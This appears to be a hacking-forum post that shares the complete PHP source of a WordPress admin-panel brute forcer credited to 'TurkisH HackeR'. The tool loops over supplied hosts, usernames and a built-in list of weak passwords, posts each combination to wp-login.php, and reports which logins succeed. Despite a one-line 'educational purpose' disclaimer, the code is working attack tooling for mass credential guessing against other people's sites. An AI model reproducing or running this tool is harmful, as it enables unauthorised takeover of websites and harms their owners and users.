Demo Bruter İçin Tıkla
Kod:
<?php
echo "
<!--
Wordpress Admin Panel Penetration Testing
V 1
PS: this tool is for penetration testing and educational purpose, ajanlar.org is not responsible at any bad using for this tool.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
-->
";
error_reporting(0);
set_time_limit(0);
ignore_user_abort(true);
?>
<html>
<head>
<title>TurkisH HackeR||Muslim HackeR Coded By xatlivacip | WordPress Admin Panel Brute Forcer</title>
<meta http-equiv=Content-Type content=text/html; charset=utf-8 charset=UTF-8>
<style type="text/css">
body {
color: blue;
background-image: url(http://www.imgbase.info/images/safe-wallpapers/miscellaneous/1_other_wallpapers/12614_1_other_wallpapers_dark_black.jpg);
}
textarea {
border-radius: 8px;
color: blue;
background-color:black;
}
input[type=submit] , .submit{
background-color:black;
color:blue;
border-radius:8px;
}
p {
font-size: 10px;
text-align: center;
}
a:link,a:hover,a:visited {
color:pink;
}
</style>
</head>
<center>
<p><a href="http://www.ajanlar.org" target="_blank"><img src="http://g1210.hizliresim.com/12/j/dzx91.png" border="0"/></a></p>
<form enctype="multipart/form-data" method="POST">
<table width='624' border='0' id='Box'>
<tr>
<td width='4%'> </td>
<td width="96%" colspan="3" align="center" ><p><h5><font face="tahoma" color="#999999"></font><center><font face="tahoma" color="#999999"><br><span style="font-weight:bold; text-shadow:red 0px 0px 8px; color:red">TurkisH HackeR||Muslim HackeR
Coded By xatlivacip | WordPress Admin Panel Brute Forcer </p></td>
</tr>
<tr>
<td > </td>
<td ><p>Hosts:</p></td>
<td ><p> Users:</p></td>
<td ><p>Passwords:</p></td>
</tr>
<tr>
<td> </td>
<td ><textarea name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
<td ><textarea name="usernames" cols="30" rows="10" ><?php if($_POST){echo $_POST['usernames'];}else {echo "admin";} ?></textarea></td>
<td ><textarea name="passwords" cols="30" rows="10" ><?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";} ?></textarea></td>
</tr>
<tr><td colspan="4"><input type="submit" name="submit" value="Brute Now" class="submit" />
<?php
if($_POST)
{
$hosts = trim(filter($_POST['hosts']));
$passwords = trim(filter($_POST['passwords']));
$usernames = trim(filter($_POST['usernames']));
if($passwords && $usernames && $hosts)
{
$hosts_explode = explode("\n", $hosts);
$usernames_explode = explode("\n", $usernames);
$passwords_explode = explode("\n", $passwords);
foreach($hosts_explode as $host)
{
$host = RemoveLastSlash($host);
$hacked = 0;
$host = str_replace(array("http://","https://","www."),"",trim($host));
$host = "http://".$host;
$wpAdmin = $host.'/wp-admin/';
if(!url_exists($host."/wp-login.php"))
{echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush();continue;}
foreach($usernames_explode as $username)
{
foreach($passwords_explode as $password)
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($ch,CURLOPT_POST,TRUE);
curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri?"."&redirect_to=".$wpAdmin."&testcookie=1");
$login = curl_exec($ch);
if(eregi ("profile.php",$login) )
{
$hacked = 1;
echo "<p>".$host." => UserName : [<font color='green'>".$username."</font>] : Password : [<font color='green'>".$password."</font>]</p>";
ob_flush();flush();break;
}
}
if($hacked == 1){break;}
}
if($hacked == 0)
{echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();}
}
}
else {echo "<p><font color='red'>All fields are Required ! </font></p>";}
}
?>
</td></tr>
</table></form>
<!-- Turkey Hacker Coded By xatlivacip | WordPress Admin Panel Brute Forcer -->
<p><a href="http://www.m4rc0-security.blogspot.com/"><h5><font face="tahoma" color="#999999"></font><center><font face="tahoma" color="#999999"><br><span style="font-weight:bold; text-shadow:red 0px 0px 8px; color:red">Copyright (C) 2008-2012 Marco-blog All Rights Reserved.</a></p>
</center>
<p>
<?php
function url_exists($strURL)
{
$resURL = curl_init();
curl_setopt($resURL, CURLOPT_URL, $strURL);
curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
curl_exec ($resURL);
$intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
curl_close ($resURL);
if ($intReturnCode != 200){return false;}
else{return true ;}
}
function filter($string)
{
if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
else{return $string; }
}
function RemoveLastSlash($host)
{
if(strrpos($host, '/', -1) == strlen($host)-1)
{return substr($host,0,strrpos($host, '/', -1));}
else{return $host;}
}
?>
<?php echo "</p>"; ?>
